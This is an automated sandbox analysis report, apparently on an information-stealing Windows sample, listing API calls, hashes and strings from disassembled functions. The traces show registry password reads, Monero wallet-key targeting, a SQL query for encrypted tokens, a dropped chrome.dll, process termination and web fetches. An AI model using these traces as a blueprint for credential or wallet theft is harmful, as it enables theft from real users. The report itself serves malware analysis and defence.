                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                      • String ID:
                                      • API String ID: 2507841554-0
                                      • Opcode ID: 03054770fca9d23b9ce46fa32c77e22eba347b3467d06beae5dccdda1487b0a7
                                      • Instruction ID: 81d00f29fe19fc219f84c84b5d76a42ce6ac69118de18252cb22835afa82b51d
                                      • Opcode Fuzzy Hash: 03054770fca9d23b9ce46fa32c77e22eba347b3467d06beae5dccdda1487b0a7
                                      • Instruction Fuzzy Hash: 2E5143B1E40318ABDF20DF90DD45BEE7779AB44301F108598F609AB1C1DB746A89CFA5
                                      APIs
                                      • type_info::operator==.LIBVCRUNTIME ref: 00AB024D
                                      • ___TypeMatch.LIBVCRUNTIME ref: 00AB035B
                                      • CatchIt.LIBVCRUNTIME ref: 00AB03AC
                                      • CallUnexpected.LIBVCRUNTIME ref: 00AB04C8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                      • String ID: csm$csm$csm
                                      • API String ID: 2356445960-393685449
                                      • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                      • Instruction ID: f126844c8607d764081972f5672dae54d37a6cfb22eaa40c1d9eeec13f0bf121
                                      • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                      • Instruction Fuzzy Hash: 14B18671800209EFCF29EFA4C985DEFBBB9BF14314B10816AE9116B253D731DA51CB91
                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00A3739A
                                      • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00A37411
                                      • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00A3746D
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00A374B2
                                      • HeapFree.KERNEL32(00000000), ref: 00A374B9
                                      • task.LIBCPMTD ref: 00A375B5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$EnumFreeOpenProcessValuetask
                                      • String ID: Password
                                      • API String ID: 775622407-3434357891
                                      • Opcode ID: 64a139873645f692cc19aecbc403395509da70ebc3ea1e8bffff9f3fe024fb69
                                      • Instruction ID: a61e317ee5c58f2927ccf17f4a121136eabbb6c423a2444262335910c914281d
                                      • Opcode Fuzzy Hash: 64a139873645f692cc19aecbc403395509da70ebc3ea1e8bffff9f3fe024fb69
                                      • Instruction Fuzzy Hash: 4661FAB590426C9BDB24DB50CD55BDAB7B8BF58300F0085E9F649A6241DBB06BC9CFA0
                                      APIs
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
                                        • Part of subcall function 00A4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00A4AC82
                                        • Part of subcall function 00A4AC30: lstrcat.KERNEL32(00000000), ref: 00A4AC92
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                        • Part of subcall function 00A4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00A4AAF6
                                      • lstrlen.KERNEL32(00000000), ref: 00A3BC6F
                                        • Part of subcall function 00A48FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00A48FE2
                                      • StrStrA.SHLWAPI(00000000,AccountId), ref: 00A3BC9D
                                      • lstrlen.KERNEL32(00000000), ref: 00A3BD75
                                      • lstrlen.KERNEL32(00000000), ref: 00A3BD89
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                      • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                      • API String ID: 3073930149-1079375795
                                      • Opcode ID: 45b168272c95782b652bb1617bc653237f4605d178d46996c36d5236a08958ff
                                      • Instruction ID: 5a6e7a688f6efec74b53945b5e58552a1954e7e179b188a08b55988b5af3ee4c
                                      • Opcode Fuzzy Hash: 45b168272c95782b652bb1617bc653237f4605d178d46996c36d5236a08958ff
                                      • Instruction Fuzzy Hash: C6B15476950118ABDB04FBA0CEA6EEE7339FFA4301F404558F506A6191EF346E49CB72
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess$DefaultLangUser
                                      • String ID: *
                                      • API String ID: 1494266314-163128923
                                      • Opcode ID: 8af3bcedf6be85bae0c6e2f7d40151e488464d8ce2cc3b17e868cb62ea45f214
                                      • Instruction ID: 0c447188cd123a1aa5d8c7f3d7122ba565207ae5603e0e2958e7c315e0a151cd
                                      • Opcode Fuzzy Hash: 8af3bcedf6be85bae0c6e2f7d40151e488464d8ce2cc3b17e868cb62ea45f214
                                      • Instruction Fuzzy Hash: AEF03A30D08309EFD3449FE1A80979CBB30AB05747F1141A5E60DDA2D0C6706A409B62
                                      APIs
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A49850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00A408DC,C:\ProgramData\chrome.dll), ref: 00A49871
                                        • Part of subcall function 00A3A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00A3A098
                                      • StrCmpCA.SHLWAPI(00000000,013188E8), ref: 00A40922
                                      • StrCmpCA.SHLWAPI(00000000,01318A48), ref: 00A40B79
                                      • StrCmpCA.SHLWAPI(00000000,013188C8), ref: 00A40A0C
                                        • Part of subcall function 00A4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00A4AAF6
                                      • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00A40C35
                                      Strings
                                      • C:\ProgramData\chrome.dll, xrefs: 00A408CD
                                      • C:\ProgramData\chrome.dll, xrefs: 00A40C30
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                      • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                      • API String ID: 585553867-663540502
                                      • Opcode ID: b321468c1850c020ca505502fa2276d4df8213eea3d157b78e017de0e4d49f89
                                      • Instruction ID: 23b26585b79c1263219b432ab7f2251f02d5e2d39d672e2566f4115a6b8efdf1
                                      • Opcode Fuzzy Hash: b321468c1850c020ca505502fa2276d4df8213eea3d157b78e017de0e4d49f89
                                      • Instruction Fuzzy Hash: BFA13575B002089FCB18EF64DA96FAD7776FFD4300F508569E90A9F251DA309A09CB92
                                      APIs
                                        • Part of subcall function 00A48CF0: GetSystemTime.KERNEL32(00A50E1B,0131E198,00A505B6,?,?,00A313F9,?,0000001A,00A50E1B,00000000,?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A48D16
                                      • wsprintfA.USER32 ref: 00A39E7F
                                      • lstrcat.KERNEL32(00000000,?), ref: 00A39F03
                                      • lstrcat.KERNEL32(00000000,?), ref: 00A39F17
                                      • lstrcat.KERNEL32(00000000,00A512D8), ref: 00A39F29
                                      • lstrcpy.KERNEL32(?,00000000), ref: 00A39F7C
                                      • Sleep.KERNEL32(00001388), ref: 00A3A013
                                        • Part of subcall function 00A499A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A499C5
                                        • Part of subcall function 00A499A0: Process32First.KERNEL32(00A3A056,00000128), ref: 00A499D9
                                        • Part of subcall function 00A499A0: Process32Next.KERNEL32(00A3A056,00000128), ref: 00A499F2
                                        • Part of subcall function 00A499A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A49A4E
                                        • Part of subcall function 00A499A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00A49A6C
                                        • Part of subcall function 00A499A0: CloseHandle.KERNEL32(00000000), ref: 00A49A79
                                        • Part of subcall function 00A499A0: CloseHandle.KERNEL32(00A3A056), ref: 00A49A88
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                      • String ID: D
                                      • API String ID: 531068710-2746444292
                                      • Opcode ID: 9f3bf194d62557d982772ff1a6f78abe3d494d2ebbe97b6fa5e2608fb861aef5
                                      • Instruction ID: 72a6c976aa37914d93b890be45166776c0e4733df1a9a781341a1d52535fc0c0
                                      • Opcode Fuzzy Hash: 9f3bf194d62557d982772ff1a6f78abe3d494d2ebbe97b6fa5e2608fb861aef5
                                      • Instruction Fuzzy Hash: 525187B5D44318ABEB24DB60DC4AFDE7378AB84704F004598B60DAB2C1EB756B88CF51
                                      APIs
                                      • _ValidateLocalCookies.LIBCMT ref: 00AAFA1F
                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00AAFA27
                                      • _ValidateLocalCookies.LIBCMT ref: 00AAFAB0
                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00AAFADB
                                      • _ValidateLocalCookies.LIBCMT ref: 00AAFB30
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 1170836740-1018135373
                                      • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                      • Instruction ID: 29a702d4a0bb8ea1ad363dbdeeeb1f2cdf7eef84cadca99bae2a9f5a9561804c
                                      • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                      • Instruction Fuzzy Hash: ED41A431A00219EFCF14EFA8C984ADE7BB5FF4A314F148166E919AB392D731D905CB91
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00A3501A
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00A35021
                                      • InternetOpenA.WININET(00A50DE3,00000000,00000000,00000000,00000000), ref: 00A3503A
                                      • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00A35061
                                      • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00A35091
                                      • InternetCloseHandle.WININET(?), ref: 00A35109
                                      • InternetCloseHandle.WININET(?), ref: 00A35116
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                      • String ID:
                                      • API String ID: 3066467675-0
                                      • Opcode ID: 10d4769fbc35127bfb9a1987719611764ff80f2353fcb3f97fb109619e0443b2
                                      • Instruction ID: 16dd6432440c36578ee3c4dd6bdd0870af0735231f5a1ae02e654d90f3837425
                                      • Opcode Fuzzy Hash: 10d4769fbc35127bfb9a1987719611764ff80f2353fcb3f97fb109619e0443b2
                                      • Instruction Fuzzy Hash: 3C31F6B4E44218ABDB24CF64DD85BDDB7B4BB48304F1081D9FA09A7281C7716EC58FA9
                                      APIs
                                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00A485B6
                                      • wsprintfA.USER32 ref: 00A485E9
                                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00A4860B
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00A4861C
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00A48629
                                        • Part of subcall function 00A4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00A4AAF6
                                      • RegQueryValueExA.ADVAPI32(00000000,0131E8C8,00000000,000F003F,?,00000400), ref: 00A4867C
                                      • lstrlen.KERNEL32(?), ref: 00A48691
                                      • RegQueryValueExA.ADVAPI32(00000000,0131EB38,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00A50B3C), ref: 00A48729
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00A48798
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00A487AA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                      • String ID: %s\%s
                                      • API String ID: 3896182533-4073750446
                                      • Opcode ID: 0636cbcb392d6e9f66e50cbadea6476eeb9defeff124b7dec101cef917c6cc9a
                                      • Instruction ID: c3dcd072f8669275b6dee332bd33430fe81648ce263484123a238f3009122e1a
                                      • Opcode Fuzzy Hash: 0636cbcb392d6e9f66e50cbadea6476eeb9defeff124b7dec101cef917c6cc9a
                                      • Instruction Fuzzy Hash: 9821EB75910218ABDB24DB54DC85FE9B3B8FB88704F1085D8E609A6280DF756A85CFA4
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A499C5
                                      • Process32First.KERNEL32(00A3A056,00000128), ref: 00A499D9
                                      • Process32Next.KERNEL32(00A3A056,00000128), ref: 00A499F2
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A49A4E
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00A49A6C
                                      • CloseHandle.KERNEL32(00000000), ref: 00A49A79
                                      • CloseHandle.KERNEL32(00A3A056), ref: 00A49A88
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                      • String ID:
                                      • API String ID: 2696918072-0
                                      • Opcode ID: 841132d90e7908c4b61e2be1d4b8d561e3115b0a1c1954d2cfcbd7313dad113e
                                      • Instruction ID: 80bd9d39de883bf0ff157f96b92daf6220a17ef0937281a8a56e2fb3df2adb10
                                      • Opcode Fuzzy Hash: 841132d90e7908c4b61e2be1d4b8d561e3115b0a1c1954d2cfcbd7313dad113e
                                      • Instruction Fuzzy Hash: 85211D74900318DBDB21DFA1CC88BDEB7B9BB48300F0041D8E50DAA290C774AE85CF61
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A47834
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00A4783B
                                      • RegOpenKeyExA.ADVAPI32(80000002,0130B788,00000000,00020119,00000000), ref: 00A4786D
                                      • RegQueryValueExA.ADVAPI32(00000000,0131EA48,00000000,00000000,?,000000FF), ref: 00A4788E
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00A47898
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
